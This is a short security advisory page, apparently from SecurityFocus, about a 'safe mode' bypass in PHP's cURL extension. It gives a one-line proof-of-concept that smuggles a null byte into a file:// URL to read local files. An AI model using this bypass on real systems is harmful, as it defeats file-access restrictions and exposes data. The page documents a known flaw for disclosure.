PHP cURL 'safe mode' Security Bypass Vulnerability

The following proof-of-concept PHP code is available:

var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));


 

Privacy Statement
Copyright 2010, SecurityFocus